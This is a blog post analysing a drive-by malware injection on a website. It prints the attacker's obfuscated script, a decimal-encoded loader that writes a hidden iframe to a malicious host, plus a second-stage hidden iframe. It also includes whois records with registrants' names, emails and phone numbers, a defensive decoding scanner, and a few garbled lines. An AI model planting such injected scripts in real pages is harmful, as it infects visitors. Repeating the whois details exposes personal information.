First published on my blog: http://www.areway.cn/?p=175
Over the weekend, as soon as I came online, my friend 鸭子 (Duck) messaged me on QQ saying his site had been hit by a drive-by malware injection (挂马). I didn't pay much attention and just opened the link directly; here is the captured page source:
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<script>t='60,105,102,114,97,109,101,32,115,
114,99,61,104,116,116,112,58,47,47,102,114,
101,101,46,117,45,117,117,117,46,99,110,47,
101,114,114,111,114,46,104,116,109,32,119,
105,100,116,104,61,49,48,48,32,104,101,105,
103,104,116,61,48,62,60,47,105,102,114,97,
109,101,62';t=eval('String.fromCharCode('+t+')');
document.write(t);</script>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Published By Newasp.cc 2007-12-7-18:03:23 -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>首页 - 爱生活家庭网
Above is a script segment whose payload is encoded as decimal character codes (十进制加密). Roughly, it stores all the character codes in t, decodes them with eval('String.fromCharCode(...)'), and finally calls document.write(t) to write the resulting string into the page.
After converting the string, the content is roughly this (click it at your own risk):
<script>t='<iframe src=http://free.u-uuu.cn/error.htm width=………
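The obfuscation above can be reversed without ever running it. The following is an added example, not code from the original post: a small Node.js scanner that pulls every quoted decimal list out of captured page source, decodes it by calling String.fromCharCode directly (no eval), and then flags iframes whose width or height is 0 or 1 pixel, which is the shape both injected frames on this page take. The sample HTML is constructed from the captured lines of this post; the function names, the eight-number minimum for a decimal list and the one-pixel threshold are my own choices.

```javascript
// Added example (not from the original post): statically decode the
// "decimal list -> String.fromCharCode -> document.write" obfuscation
// captured above and flag hidden iframes, without executing any script.

// Constructed sample built from the captured lines: the injected decimal
// script, the second-stage 1x1 iframe, and one benign script to ignore.
const SAMPLE_HTML = `
<script>t='60,105,102,114,97,109,101,
32,115,114,99,61,104,116,116,112,58,47,47,
102,114,101,101,46,117,45,117,117,117,46,99,
110,47,101,114,114,111,114,46,104,116,109,
32,119,105,100,116,104,61,49,48,48,32,104,
101,105,103,104,116,61,48,62,60,47,105,102,
114,97,109,101,62';
t=eval('String.fromCharCode('+t+')');document.write(t);</script>
<html><head><title>Home</title>
<script>var counter = 1;</script>
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
</head></html>`;

// A quoted list of at least eight comma-separated decimal numbers
// (line breaks inside the list are allowed, as in the capture).
const DECIMAL_LIST = /['"]\s*(\d{1,3}(?:\s*,\s*\d{1,3}){7,})\s*['"]/g;

// Decode every decimal list the way the malware does, but by calling
// String.fromCharCode directly instead of building a string for eval.
function decodeDecimalStrings(html) {
  const decoded = [];
  for (const m of html.matchAll(DECIMAL_LIST)) {
    const codes = m[1].split(",").map((n) => parseInt(n.trim(), 10));
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// True when the page carries the tell-tale combination of eval,
// String.fromCharCode and a long decimal list.
function looksObfuscated(html) {
  return /eval\s*\(/.test(html) &&
    /String\.fromCharCode/.test(html) &&
    html.search(DECIMAL_LIST) >= 0;
}

// Read one attribute (quoted or unquoted) out of an iframe's attribute text.
function attr(attrs, name) {
  const m = new RegExp(name + "\\s*=\\s*[\"']?([^\\s\"'>]+)", "i").exec(attrs);
  return m ? m[1] : "";
}

// Report the iframes a visitor could never see: either dimension is 0 or 1.
const IFRAME_TAG = /<iframe\b([^>]*)>/gi;
function findHiddenIframes(markup) {
  const hits = [];
  for (const m of markup.matchAll(IFRAME_TAG)) {
    const attrs = m[1];
    const src = attr(attrs, "src");
    const width = parseInt(attr(attrs, "width"), 10);
    const height = parseInt(attr(attrs, "height"), 10);
    const hidden = (Number.isFinite(width) && width <= 1) ||
                   (Number.isFinite(height) && height <= 1);
    if (!hidden) continue;
    let host = src;
    try { host = new URL(src).hostname; } catch (_) { /* keep the raw src */ }
    hits.push({ src, host, width, height });
  }
  return hits;
}

// Scan the raw markup and everything the decimal strings decode to.
function scanPage(html) {
  const decoded = decodeDecimalStrings(html);
  const hidden = findHiddenIframes(html);
  for (const s of decoded) hidden.push(...findHiddenIframes(s));
  return { obfuscated: looksObfuscated(html), decoded, hidden };
}

console.log(JSON.stringify(scanPage(SAMPLE_HTML), null, 2));
```

On the sample, the decoded string is exactly the `<iframe src=http://free.u-uuu.cn/error.htm width=100 height=0></iframe>` shown above, and both the zero-height frame and the second-stage 1x1 frame are reported with their hostnames. A real capture may decode to yet another script, so in practice the decoded strings should be fed back through the scanner until nothing new appears.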
Whois lookup for the domain u-uuu.cn:
Domain Name: u-uuu.cn
ROID: 20070901s10001s64972306-cn
Domain Status: ok
Registrant Organization: 王雷
Registrant Name: 王雷
Administrative Email: czlovexs@126.com
Sponsoring Registrar: 北京万网志成科技有限公司
Name Server:ns.yovole.com
Name Server:ns1.yovole.com
Registration Date: 2007-09-01 17:54
Expiration Date: 2008-09-01 17:54
Finally I pinged the address; nothing came of it....
I continued the analysis inside a virtual machine: opened the link above in IE, viewed the source... and straight away there was another nested iframe.
<iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
<script language="javascript" src="http://count43.51yes.com/click.aspx?id=4333375720&logo=6"></script>
f0^s<:* 这个玉米应该有可能是木马作者的:
=IX-n$d`> foafau.info的详细信息:
Access to INFO WHOIS information is provided to assist persons in
determining the contents of a domain name registration record in the
Afilias registry database. The data in this record is provided by
Afilias Limited for informational purposes only, and Afilias does not
guarantee its accuracy. This service is intended only for query-based
access. You agree that you will use this data only for lawful purposes
and that, under no circumstances will you use this data to: (a) allow,
enable, or otherwise support the transmission by e-mail, telephone, or
facsimile of mass unsolicited, commercial advertising or solicitations
to entities other than the data recipient's own existing customers; or
(b) enable high volume, automated, electronic processes that send
queries or data to the systems of Registry Operator, a Registrar, or
Afilias except as reasonably necessary to register domain names or
modify existing registrations. All rights reserved. Afilias reserves
the right to modify these terms at any time. By submitting this query,
you agree to abide by this policy.
Domain ID:D22418703-LRMS
Domain Name:FOAFAU.INFO
Created On:20-Nov-2007 16:05:42 UTC
Last Updated On:20-Nov-2007 16:05:44 UTC
Expiration Date:20-Nov-2008 16:05:42 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:GODA-040110615
Registrant Name:liu hong
Registrant Organization:
Registrant Street1:beijing
Registrant Street2:
Registrant Street3:
Registrant City:beijing
Registrant State/Province:
Registrant Postal Code:100000
Registrant Country:CN
Registrant Phone:+86.860108888777
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:bbbshiji@163.com
Admin ID:GODA-240110615
Admin Name:liu hong
Admin Organization:
Admin Street1:beijing
Admin Street2:
Admin Street3:
Admin City:beijing
Admin State/Province:
Admin Postal Code:100000
Admin Country:CN
Admin Phone:+86.860108888777
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:bbbshiji@163.com
Billing ID:GODA-340110615
Billing Name:liu hong
Billing Organization:
Billing Street1:beijing
Billing Street2:
Billing Street3:
Billing City:beijing
Billing State/Province:
Billing Postal Code:100000
Billing Country:CN
Billing Phone:+86.860108888777
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:bbbshiji@163.com
Tech ID:GODA-140110615
Tech Name:liu hong
Tech Organization:
Tech Street1:beijing
Tech Street2:
Tech Street3:
Tech City:beijing
Tech State/Province:
Tech Postal Code:100000
Tech Country:CN
Tech Phone:+86.860108888777
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:bbbshiji@163.com
Name Server:NS27.DOMAINCONTROL.COM
Name Server:NS28.DOMAINCONTROL.COM
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Name Server:
Next I downloaded the code from each of the files:
Looking through them step by step..
They are all decimal-encoded code as well; I couldn't be bothered to analyse them further. Anyone who enjoys this sort of thing can carry on from here.